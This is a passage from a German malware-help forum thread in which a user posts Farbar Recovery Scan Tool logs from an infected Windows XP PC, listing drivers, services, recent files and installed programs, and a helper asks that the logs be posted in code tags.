(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S3 Ambfilt; C:\WINDOWS\System32\drivers\Ambfilt.sys [1691480 2009-11-18] (Creative)
R1 AmdK8; C:\WINDOWS\System32\DRIVERS\AmdK8.sys [43520 2006-07-01] (Advanced Micro Devices)
R1 FsVga; C:\WINDOWS\System32\DRIVERS\fsvga.sys [12288 2006-02-28] (Microsoft Corporation)
S3 Monfilt; C:\WINDOWS\System32\drivers\Monfilt.sys [1395800 2009-11-18] (Creative Technology Ltd.)
S3 NPPTNT2; C:\WINDOWS\system32\npptNT2.sys [4682 2005-01-04] (INCA Internet Co., Ltd.) [Datei ist nicht signiert]
R0 nvata; C:\WINDOWS\System32\DRIVERS\nvata.sys [105344 2006-08-14] (NVIDIA Corporation)
R3 NVENETFD; C:\WINDOWS\System32\DRIVERS\NVENETFD.sys [57856 2006-07-11] (NVIDIA Corporation)
R3 nvnetbus; C:\WINDOWS\System32\DRIVERS\nvnetbus.sys [20480 2006-07-11] (NVIDIA Corporation)
S3 Secdrv; C:\WINDOWS\System32\DRIVERS\secdrv.sys [27440 2006-02-28] ()
S3 GMSIPCI; \??\F:\INSTALL\GMSIPCI.SYS [X]
S4 IntelIde; kein ImagePath
S3 RegGuard; \??\C:\WINDOWS\system32\Drivers\regguard.sys [X]
U1 WS2IFSL; kein ImagePath
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
NETSVC: rkvnw -> C:\WINDOWS\system32\vstnvj.dll ()
==================== Ein Monat: Erstellte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-05-23 10:53 - 2017-05-23 10:53 - 00012296 _____ C:\Programme\FRST.txt
2017-05-23 10:53 - 2017-05-23 10:53 - 00000000 ____D C:\FRST
2017-05-23 10:51 - 2017-05-23 10:51 - 02213976 _____ (Kaspersky Lab ZAO) C:\Dokumente und Einstellungen\*\Desktop\tdsskiller.exe
2017-05-23 10:43 - 2017-05-23 10:44 - 01770496 _____ (Farbar) C:\Programme\FRST.exe
2017-05-23 03:26 - 2017-05-23 03:49 - 00000183 _____ C:\Dokumente und Einstellungen\*\Desktop\heul.txt
2017-05-23 03:17 - 2017-05-23 03:17 - 00090112 _____ C:\WINDOWS\Minidump\Mini052317-01.dmp
2017-05-23 01:37 - 2017-05-23 01:37 - 00000285 _____ C:\Programme\Search.txt
2017-05-23 00:42 - 2017-05-23 10:10 - 00003818 _____ C:\Dokumente und Einstellungen\*\Desktop\stirb.txt
2017-05-23 00:40 - 2017-05-23 03:20 - 00000000 ____D C:\Programme\Autoruns
2017-05-22 23:10 - 2017-05-22 23:10 - 01305367 _____ C:\Programme\Autoruns.zip
2017-05-22 21:09 - 2017-05-22 21:09 - 04110280 _____ C:\Programme\adwcleaner_6.047.exe
2017-05-22 18:30 - 2017-05-22 18:30 - 00090112 _____ C:\WINDOWS\Minidump\Mini052217-01.dmp
2017-05-21 23:24 - 2017-05-21 23:25 - 485468965 _____ C:\Dokumente und Einstellungen\*\Desktop\ohne.mkv
2017-05-21 22:40 - 2017-05-21 23:30 - 143638013 _____ C:\Dokumente und Einstellungen\*\Desktop\[HorribleSubs] Folktales from Japan S2 - 08 [480p].mkv
2017-05-21 22:05 - 2017-05-21 22:31 - 485537312 _____ C:\Dokumente und Einstellungen\*\Desktop\[PM]Pocket_Monsters_Sun_&_Moon_021_It_is_Time_for_Nyabby_to_Set_Off![H264_720P][CC06CC61].mkv
2017-05-21 21:11 - 2017-05-21 21:11 - 00090112 _____ C:\WINDOWS\Minidump\Mini052117-01.dmp
2017-05-21 17:58 - 2017-05-21 19:16 - 00005941 _____ C:\Dokumente und Einstellungen\*\Eigene Dateien\Favorisiertes Design.theme
2017-05-21 15:20 - 2017-05-21 18:19 - 00065536 _____ C:\WINDOWS\system32\config\Doctor Web.evt
2017-05-21 13:17 - 2017-05-21 13:17 - 00000774 _____ C:\Dokumente und Einstellungen\LocalService\Startmenü\Programme\Windows Media Player.lnk
2017-05-21 13:17 - 2017-05-21 13:17 - 00000000 ___RD C:\Dokumente und Einstellungen\LocalService\Startmenü\Programme\Zubehör
2017-05-21 13:17 - 2017-05-21 13:17 - 00000000 ___RD C:\Dokumente und Einstellungen\LocalService\Favoriten
2017-05-21 13:17 - 2017-05-21 13:17 - 00000000 ___RD C:\Dokumente und Einstellungen\LocalService\Eigene Dateien\Eigene Musik
2017-05-21 13:17 - 2017-05-21 13:17 - 00000000 ___RD C:\Dokumente und Einstellungen\LocalService\Eigene Dateien\Eigene Bilder
2017-05-21 13:17 - 2017-05-21 13:17 - 00000000 ___RD C:\Dokumente und Einstellungen\LocalService\Eigene Dateien
2017-05-21 13:17 - 2017-05-21 13:17 - 00000000 ___HD C:\Dokumente und Einstellungen\LocalService\Netzwerkumgebung
2017-05-21 13:17 - 2017-05-21 13:17 - 00000000 ____D C:\Dokumente und Einstellungen\LocalService\Startmenü\Programme\Autostart
2017-05-21 13:17 - 2017-05-21 13:17 - 00000000 ____D C:\Dokumente und Einstellungen\LocalService\Startmenü\Programme
2017-05-21 13:17 - 2017-05-21 13:17 - 00000000 ____D C:\Dokumente und Einstellungen\LocalService\Startmenü
2017-05-21 13:17 - 2006-02-28 14:00 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpns.dll
2017-05-21 01:47 - 2017-05-21 01:48 - 22851472 _____ (Malwarebytes ) C:\Programme\mbam-setup-2.2.1.1043.exe
2017-05-20 20:37 - 2017-05-20 20:42 - 77279012 _____ C:\Dokumente und Einstellungen\*\Desktop\dig33.mp4
2017-05-19 23:00 - 2017-05-23 00:40 - 00000045 _____ C:\WINDOWS\system32\1.txt
2017-05-17 13:19 - 2017-05-17 13:19 - 00090112 _____ C:\WINDOWS\Minidump\Mini051717-01.dmp
2017-05-16 19:59 - 2017-05-16 19:59 - 00000000 ____D C:\Programme\SumatraPDF-1.5.1
2017-05-12 21:30 - 2017-05-12 21:30 - 00090112 _____ C:\WINDOWS\Minidump\Mini051217-01.dmp
2017-05-01 15:03 - 2017-05-01 15:03 - 00090112 _____ C:\WINDOWS\Minidump\Mini050117-01.dmp
==================== Ein Monat: Geänderte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-05-23 10:53 - 2007-10-25 12:55 - 00000000 ____D C:\Programme
2017-05-23 10:53 - 2007-10-25 12:18 - 00000000 ____D C:\Dokumente und Einstellungen\*\Lokale Einstellungen\Temp
2017-05-23 10:43 - 2010-12-15 20:06 - 00000000 ____D C:\Programme\Mozilla Firefox
2017-05-23 09:45 - 2007-10-25 12:37 - 00065580 _____ C:\WINDOWS\system32\nvapps.xml
2017-05-23 09:45 - 2007-10-25 12:13 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-05-23 04:32 - 2007-10-25 12:18 - 00000190 ___SH C:\Dokumente und Einstellungen\*\ntuser.ini
2017-05-23 04:32 - 2007-10-25 12:13 - 00032626 _____ C:\WINDOWS\SchedLgU.Txt
2017-05-23 04:02 - 2007-10-25 12:55 - 00000000 ____D C:\Programme\Gemeinsame Dateien
2017-05-23 03:55 - 2008-10-01 23:57 - 00000000 ____D C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\SecTaskMan
2017-05-23 03:55 - 2007-10-25 12:54 - 00000000 __RHD C:\Dokumente und Einstellungen\All Users\Anwendungsdaten
2017-05-23 03:54 - 2007-10-25 12:18 - 00000000 ____D C:\Dokumente und Einstellungen\*
2017-05-23 03:52 - 2007-10-25 12:54 - 00000000 ____D C:\Dokumente und Einstellungen\All Users\Startmenü\Programme
2017-05-23 03:49 - 2012-11-20 16:55 - 00010110 _____ C:\Dokumente und Einstellungen\*\Desktop\-.txt
2017-05-23 03:17 - 2008-02-11 01:10 - 00000000 ____D C:\WINDOWS\Minidump
2017-05-21 22:54 - 2010-10-21 21:31 - 00000000 ___RD C:\Dokumente und Einstellungen\*\Desktop\Usagi
2017-05-21 19:16 - 2007-10-25 12:18 - 00000000 ___RD C:\Dokumente und Einstellungen\*\Eigene Dateien
2017-05-21 18:55 - 2010-09-13 21:22 - 00000000 ____D C:\Dokumente und Einstellungen\*\Anwendungsdaten\vlc
2017-05-21 14:15 - 2007-10-25 13:48 - 00000000 ____D C:\WINDOWS\pchealth
2017-05-21 14:04 - 2007-10-25 13:53 - 00000223 ___SH C:\boot.ini
2017-05-21 14:04 - 2006-02-28 14:00 - 00001015 _____ C:\WINDOWS\win.ini
2017-05-21 14:04 - 2006-02-28 14:00 - 00000227 _____ C:\WINDOWS\system.ini
2017-05-21 13:17 - 2007-10-27 17:45 - 00000000 __HDC C:\WINDOWS\$NtUninstallKB918439$
2017-05-21 13:17 - 2007-10-25 12:13 - 00000000 __SHD C:\Dokumente und Einstellungen\LocalService
2017-05-21 13:17 - 2007-10-25 12:13 - 00000000 ___SD C:\Dokumente und Einstellungen\LocalService\Lokale Einstellungen\Verlauf
2017-05-21 13:17 - 2007-10-25 12:13 - 00000000 ____D C:\Dokumente und Einstellungen\LocalService\Anwendungsdaten
2017-05-21 13:17 - 2007-10-25 12:10 - 00001174 _____ C:\WINDOWS\OEWABLog.txt
2017-05-21 03:08 - 2007-10-25 12:18 - 00000000 __RHD C:\Dokumente und Einstellungen\*\Anwendungsdaten
2017-05-20 15:56 - 2007-10-25 13:48 - 00000000 RSHDC C:\WINDOWS\system32\dllcache
2017-05-20 15:38 - 2006-02-28 14:00 - 00013646 _____ C:\WINDOWS\system32\wpa.dbl
2017-05-19 23:06 - 2017-04-09 13:42 - 00000000 ____D C:\Dokumente und Einstellungen\*\Desktop\Assassination Classroom S2][BDRip][OVA][01-08][CHS][1080P][MP4]
2017-05-19 23:02 - 2007-10-25 12:55 - 00723744 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-05-19 23:02 - 2006-02-28 14:00 - 00316594 _____ C:\WINDOWS\system32\perfh007.dat
2017-05-19 23:02 - 2006-02-28 14:00 - 00048156 _____ C:\WINDOWS\system32\perfc007.dat
2017-05-18 17:48 - 2015-05-23 22:08 - 00000000 ____D C:\Dokumente und Einstellungen\*\Desktop\x
2017-05-18 01:23 - 2007-10-25 12:54 - 00000000 ___RD C:\Dokumente und Einstellungen\All Users\Dokumente
2017-05-16 23:59 - 2015-01-24 18:33 - 00000000 ___RD C:\Dokumente und Einstellungen\*\Desktop\DEL
2017-05-06 19:45 - 2010-08-03 17:22 - 00000000 ____D C:\Dokumente und Einstellungen\*\Desktop\MANGA
2017-05-02 21:50 - 2009-10-05 14:11 - 00000000 ____D C:\Dokumente und Einstellungen\*\Anwendungsdaten\mIRC
2017-05-02 20:19 - 2012-01-23 22:27 - 00000000 ____D C:\Programme\mIRC
2017-04-28 21:38 - 2007-10-25 12:18 - 00000000 ___RD C:\Dokumente und Einstellungen\*\Eigene Dateien\Eigene Bilder
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======
2007-10-25 18:25 - 2003-06-16 16:06 - 0805390 _____ () C:\Programme\1AView.exe
2007-10-25 18:25 - 2004-06-02 19:29 - 0310819 _____ () C:\Programme\Ac3 (Dolby Digital) Audio Codec.exe
2007-10-25 18:25 - 2004-06-02 18:43 - 0302680 _____ () C:\Programme\ac3filter_0_70b.exe
2017-05-22 21:09 - 2017-05-22 21:09 - 4110280 _____ () C:\Programme\adwcleaner_6.047.exe
2010-10-14 21:05 - 2010-10-14 21:05 - 21202324 _____ (Aegisub Team ) C:\Programme\Aegisub-2.1.8-portable.exe
2007-12-27 12:50 - 2007-12-27 12:53 - 7473662 _____ () C:\Programme\AMV_Convert_400.zip
2017-01-30 02:31 - 2017-01-30 02:32 - 27678498 _____ () C:\Programme\anki-2.0.41-alternate.exe
2007-10-25 18:25 - 2004-04-09 22:45 - 3766897 _____ () C:\Programme\anygif.zip
2017-05-22 23:10 - 2017-05-22 23:10 - 1305367 _____ () C:\Programme\Autoruns.zip
2011-04-13 20:19 - 2011-04-13 20:20 - 7987953 _____ (CCCP Project ) C:\Programme\Combined-Community-Codec-Pack-2010-10-10.exe
2016-12-26 18:59 - 2016-12-26 18:59 - 2499422 _____ () C:\Programme\cpu-z_1.78-en.zip
2016-12-25 19:37 - 2016-12-25 19:37 - 4867137 _____ () C:\Programme\CrystalDiskInfo7_0_4.zip
2011-07-18 18:00 - 2011-07-18 18:00 - 0501994 _____ () C:\Programme\Cyko_07_17_11.7z
2007-10-26 11:58 - 2007-10-13 16:39 - 0362496 _____ () C:\Programme\DarkShot2.exe
2007-10-25 18:26 - 2006-08-15 00:30 - 11371160 _____ (Microsoft Corporation) C:\Programme\DX80ger.exe
2007-10-25 18:26 - 2007-10-18 14:28 - 8557169 _____ () C:\Programme\ermp194_full.zip
2015-08-10 15:32 - 2015-08-10 15:32 - 0243000 _____ () C:\Programme\Firefox Setup Stub 39.0.3.exe
2011-01-27 16:20 - 2011-01-27 16:22 - 43184640 _____ () C:\Programme\Format_Factory260DE.exe
2008-12-21 02:42 - 2008-12-21 02:43 - 7940781 _____ (DVD Video Soft Limited. ) C:\Programme\FreeVideoDub.exe
2017-05-23 10:43 - 2017-05-23 10:44 - 1770496 _____ (Farbar) C:\Programme\FRST.exe
2017-05-23 10:53 - 2017-05-23 10:53 - 0012296 _____ () C:\Programme\FRST.txt
2011-07-18 18:00 - 2011-07-18 18:00 - 7272798 _____ () C:\Programme\HandBrake-0.9.5-Win_CLI.zip
2010-10-19 02:35 - 2010-10-19 02:35 - 2791751 _____ () C:\Programme\happy_splasher_setup.zip
2009-05-04 19:01 - 2009-05-04 19:01 - 0812344 _____ (Trend Micro Inc.) C:\Programme\HJTInstall.exe
2007-10-25 18:26 - 2005-02-09 16:29 - 4316184 _____ () C:\Programme\ICQ2001b.exe
2007-10-25 18:26 - 2005-08-06 16:17 - 2518608 _____ (Microsoft Corporation) C:\Programme\ie3lpkja.exe
2007-10-26 23:36 - 2007-10-26 23:35 - 0183300 _____ () C:\Programme\inetuhr.zip
2007-10-25 18:26 - 2006-03-15 17:40 - 0952496 _____ () C:\Programme\install_flash_player.exe
2007-10-25 18:26 - 2004-04-24 22:43 - 0820736 _____ () C:\Programme\iview390.exe
2012-02-28 00:21 - 2012-02-28 00:56 - 24407551 _____ () C:\Programme\M3SAKURA_M32.zip
2008-03-16 01:14 - 2008-03-16 01:16 - 0717797 _____ () C:\Programme\MatroskaSplitter.exe
2017-05-21 01:47 - 2017-05-21 01:48 - 22851472 _____ (Malwarebytes ) C:\Programme\mbam-setup-2.2.1.1043.exe
2016-12-25 23:17 - 2016-12-25 23:18 - 0015565 _____ () C:\Programme\MemTest.zip
2012-01-23 22:23 - 2012-01-23 22:23 - 1909192 _____ (mIRC Co. Ltd.) C:\Programme\mirc722.exe
2007-10-25 18:26 - 2002-10-27 00:22 - 10501776 _____ (Microsoft Corporation) C:\Programme\mp71.exe
2007-10-27 18:56 - 2007-10-27 18:56 - 0535512 _____ () C:\Programme\pllangs.exe
2011-04-14 11:33 - 2011-04-14 11:33 - 5446282 _____ ( ) C:\Programme\Real_Alternative_202_Lite.exe
2007-10-25 18:26 - 2006-12-11 15:00 - 3451280 _____ (Boilsoft ) C:\Programme\rm_converter.exe
2007-10-25 18:26 - 2003-10-21 21:59 - 11581544 _____ (InstallShield Software Corporation) C:\Programme\rp505deu.exe
2017-05-23 01:37 - 2017-05-23 01:37 - 0000285 _____ () C:\Programme\Search.txt
2007-10-25 18:26 - 2006-03-15 17:37 - 5779136 _____ () C:\Programme\Shockwave_Installer_Full.exe
2008-01-16 01:46 - 2008-01-16 01:45 - 0788788 _____ () C:\Programme\skinamp.exe
2007-10-25 18:27 - 2004-01-21 19:17 - 0139399 _____ () C:\Programme\StoikVideoConverter10.zip
2008-10-01 23:56 - 2008-10-01 23:56 - 1693024 _____ () C:\Programme\taskmanager17.exe
2007-10-25 18:27 - 2002-10-30 20:03 - 2334574 _____ () C:\Programme\v253jcompl.exe
2007-10-25 18:26 - 2005-03-04 15:23 - 0707884 _____ () C:\Programme\VirtualDub-1_4_11.zip
2010-09-13 21:15 - 2010-09-13 21:15 - 19657194 _____ () C:\Programme\vlc-1.1.4-win32.exe
2007-10-25 18:26 - 2002-04-16 17:28 - 0525427 _____ () C:\Programme\winamp279_lite.exe
2007-10-27 15:18 - 2007-10-27 15:18 - 2082544 _____ (Microsoft Corporation) C:\Programme\WindowsXP-KB894391-x86-DEU.exe
2007-10-25 18:26 - 2003-01-23 19:23 - 0945684 _____ () C:\Programme\winrar30ce.exe
2007-10-25 18:26 - 2003-04-08 22:20 - 1880064 _____ () C:\Programme\wz81gev.exe
2007-10-25 18:26 - 2004-12-28 16:11 - 0635569 _____ (XviD Team (Koepi) ) C:\Programme\XviD-1.0.3-20122004.exe
2008-09-21 01:21 - 2008-08-28 00:43 - 0061952 _____ () C:\Programme\Zylom.Games.Universal.Patcher.v2.0.exe
2009-07-07 15:00 - 2009-07-07 15:01 - 0002288 _____ () C:\Dokumente und Einstellungen\*\Anwendungsdaten\ASSDraw3.cfg
2007-10-25 13:16 - 2017-04-18 00:05 - 0192512 _____ () C:\Dokumente und Einstellungen\*\Lokale Einstellungen\Anwendungsdaten\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2010-09-26 03:27 - 2010-09-26 03:27 - 0003774 _____ () C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\114la.ico
Einige Dateien in TEMP:
====================
2014-09-06 16:40 - 2014-09-06 16:56 - 11585589 _____ (Microsoft Corporation) C:\Dokumente und Einstellungen\*\Lokale Einstellungen\Temp\DotNetFx20Client_Package_x86.exe
2011-04-04 10:27 - 2011-04-04 10:27 - 0292184 _____ (Microsoft Corporation) C:\Dokumente und Einstellungen\*\Lokale Einstellungen\Temp\dxwebsetup.exe
2011-01-27 16:23 - 2010-11-04 11:57 - 36895984 _____ () C:\Dokumente und Einstellungen\*\Lokale Einstellungen\Temp\FFSetupSoftonic260.exe
2011-05-02 03:17 - 2011-05-02 03:17 - 2832544 _____ (Adobe Systems, Inc.) C:\Dokumente und Einstellungen\*\Lokale Einstellungen\Temp\FP_PL_PFS_INSTALLER.exe
2007-10-25 19:40 - 2007-10-25 19:40 - 0075080 _____ (RealNetworks, Inc.) C:\Dokumente und Einstellungen\*\Lokale Einstellungen\Temp\InfoWindow.dll
2007-10-27 14:54 - 2004-10-12 11:14 - 0057344 _____ () C:\Dokumente und Einstellungen\*\Lokale Einstellungen\Temp\InstHelp.dll
2008-10-17 15:07 - 2008-10-17 15:07 - 1701371 _____ (mIRC Co. Ltd.) C:\Dokumente und Einstellungen\*\Lokale Einstellungen\Temp\mirc635.exe
2011-10-13 11:58 - 2011-10-13 11:58 - 1853752 _____ (mIRC Co. Ltd.) C:\Dokumente und Einstellungen\*\Lokale Einstellungen\Temp\mirc722.exe
2008-12-23 13:13 - 2006-02-28 14:00 - 0778240 _____ (Microsoft Corporation) C:\Dokumente und Einstellungen\*\Lokale Einstellungen\Temp\setup_wm.exe
2010-06-16 01:52 - 2010-06-16 01:52 - 0135168 _____ (Eclipse Foundation) C:\Dokumente und Einstellungen\*\Lokale Einstellungen\Temp\swt-win32-3349.dll
2007-11-01 20:42 - 2007-11-01 20:42 - 0027136 _____ () C:\Dokumente und Einstellungen\*\Lokale Einstellungen\Temp\uninstall.exe
2011-12-29 06:07 - 2011-12-29 06:07 - 4216840 _____ (Microsoft Corporation) C:\Dokumente und Einstellungen\*\Lokale Einstellungen\Temp\vcredist_x86.exe
2014-09-06 16:40 - 2014-09-06 16:40 - 1227048 _____ (Microsoft Corporation) C:\Dokumente und Einstellungen\*\Lokale Einstellungen\Temp\wic_x86_enu.exe
2009-05-04 02:30 - 2009-05-04 02:30 - 0065536 _____ () C:\Dokumente und Einstellungen\*\Lokale Einstellungen\Temp\wJQs.exe
==================== Bamital & volsnap ======================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert
==================== Ende vom FRST.txt ============================
|
|
23.05.2017, 12:49
| #5 |
| /// Winkelfunktion /// TB-Süch-Tiger™ | ActiveXObject Scrip Virus - Name: fuckyoumm2_consumer Die Logs nicht in den Anhang! Das erschwert die Auswertung!
__________________ Logfiles bitte immer in CODE-Tags posten  |
|
23.05.2017, 12:50
| #6 |
| | ActiveXObject Scrip Virus - Name: fuckyoumm2_consumerCode:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x86) Version: 22-05-2017
durchgeführt von * (23-05-2017 10:54:13)
Gestartet von C:\Programme
Microsoft Windows XP Home Edition (X86) (2007-10-25 10:12:21)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-343818398-162531612-839522115-500 - Administrator - Enabled)
Gast (S-1-5-21-343818398-162531612-839522115-501 - Limited - Enabled)
Hilfeassistent (S-1-5-21-343818398-162531612-839522115-1000 - Limited - Disabled)
SUPPORT_388945a0 (S-1-5-21-343818398-162531612-839522115-1002 - Limited - Disabled)
* (S-1-5-21-343818398-162531612-839522115-1004 - Administrator - Enabled) => %SystemDrive%\Dokumente und Einstellungen\*
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
7-Zip 9.20 (HKLM\...\7-Zip) (Version: - )
AC3Filter (remove only) (HKLM\...\AC3Filter) (Version: - )
Adobe Flash Player 11 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 11.2.202.235 - Adobe Systems Incorporated)
Adobe Shockwave Player (HKLM\...\Adobe Shockwave Player) (Version: 10.2.0.23 - Adobe Systems, Inc.)
Anki (HKLM\...\Anki) (Version: - )
Combined Community Codec Pack 2010-10-10 (HKLM\...\Combined Community Codec Pack_is1) (Version: 2010.10.10.0 - CCCP Project)
DeskPins (remove only) (HKLM\...\DeskPins) (Version: - )
DivX Codec (HKLM\...\DivX Codec) (Version: - )
Free Video Dub version 1.4 (HKLM\...\Free Video Dub_is1) (Version: - DVD Video Soft Limited.)
Happy Splasher 1.0 (HKLM\...\Happy Splasher) (Version: 1.0 - Withit)
High Definition Audio Driver Package - KB888111 (HKLM\...\KB888111WXPSP2) (Version: 20040219.000000 - Microsoft Corporation)
HijackThis 2.0.2 (HKLM\...\HijackThis) (Version: 2.0.2 - TrendMicro)
Hotfix für Windows XP (KB935448) (HKLM\...\KB935448) (Version: 1 - Microsoft Corporation)
ICQ (HKLM\...\ICQ) (Version: - )
IrfanView (remove only) (HKLM\...\IrfanView) (Version: - )
Japanese Fonts Support For Adobe Reader 8 (HKLM\...\{AC76BA86-7AD7-5760-0000-800000000003}) (Version: 8.0 - Adobe Systems)
Microsoft Compression Client Pack 1.0 for Windows XP (HKLM\...\MSCompPackV1) (Version: 1 - Microsoft Corporation)
Microsoft Office 97, Professional Edition (HKLM\...\Office8.0) (Version: - )
Microsoft User-Mode Driver Framework Feature Pack 1.0 (HKLM\...\Wudf01000) (Version: - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
mIRC (HKLM\...\mIRC) (Version: 7.22 - mIRC Co. Ltd.)
MKVtoolnix 4.3.0 (HKLM\...\MKVtoolnix) (Version: 4.3.0 - Moritz Bunkus)
Mozilla Firefox 39.0.3 (x86 de) (HKLM\...\Mozilla Firefox 39.0.3 (x86 de)) (Version: 39.0.3 - Mozilla)
MP3 Player Utilities 4.00 (HKLM\...\{7784A172-61F1-445E-8368-601607E0DD22}) (Version: 4.00 - )
NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: - )
Real Alternative 2.0.2 Lite (HKLM\...\RealAlt_is1) (Version: 2.0.2 - )
RealPlayer (HKLM\...\RealPlayer 6.0) (Version: - RealNetworks)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 5.10.0.6316 - Realtek Semiconductor Corp.)
Security Task Manager 1.7f (HKLM\...\Security Task Manager) (Version: 1.7f - Neuber GmbH)
Sicherheitsupdate für Windows Media Player (KB911564) (Version: - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Media Player 6.4 (KB925398) (HKLM\...\KB925398_WMP64) (Version: - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player 9 (KB936782) (Version: - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows XP (KB890046) (HKLM\...\KB890046) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB893756) (HKLM\...\KB893756) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB896358) (HKLM\...\KB896358) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB896423) (HKLM\...\KB896423) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB896428) (HKLM\...\KB896428) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB899587) (HKLM\...\KB899587) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB899591) (HKLM\...\KB899591) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB900725) (HKLM\...\KB900725) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB901017) (HKLM\...\KB901017) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB901214) (HKLM\...\KB901214) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB902400) (HKLM\...\KB902400) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB904706) (HKLM\...\KB904706) (Version: 2 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB905414) (HKLM\...\KB905414) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB905749) (HKLM\...\KB905749) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB908519) (HKLM\...\KB908519) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB911562) (HKLM\...\KB911562) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB911927) (HKLM\...\KB911927) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB913580) (HKLM\...\KB913580) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB914388) (HKLM\...\KB914388) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB914389) (HKLM\...\KB914389) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB917344) (HKLM\...\KB917344) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB917953) (HKLM\...\KB917953) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB918118) (HKLM\...\KB918118) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB918439) (HKLM\...\KB918439) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB919007) (HKLM\...\KB919007) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB920213) (HKLM\...\KB920213) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB920670) (HKLM\...\KB920670) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB920683) (HKLM\...\KB920683) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB920685) (HKLM\...\KB920685) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB921503) (HKLM\...\KB921503) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB922819) (HKLM\...\KB922819) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB923191) (HKLM\...\KB923191) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB923414) (HKLM\...\KB923414) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB923689) (HKLM\...\KB923689) (Version: - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB923789) (HKLM\...\KB923789) (Version: - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB923980) (HKLM\...\KB923980) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB924270) (HKLM\...\KB924270) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB924496) (HKLM\...\KB924496) (Version: 1 - Microsoft Corporation)
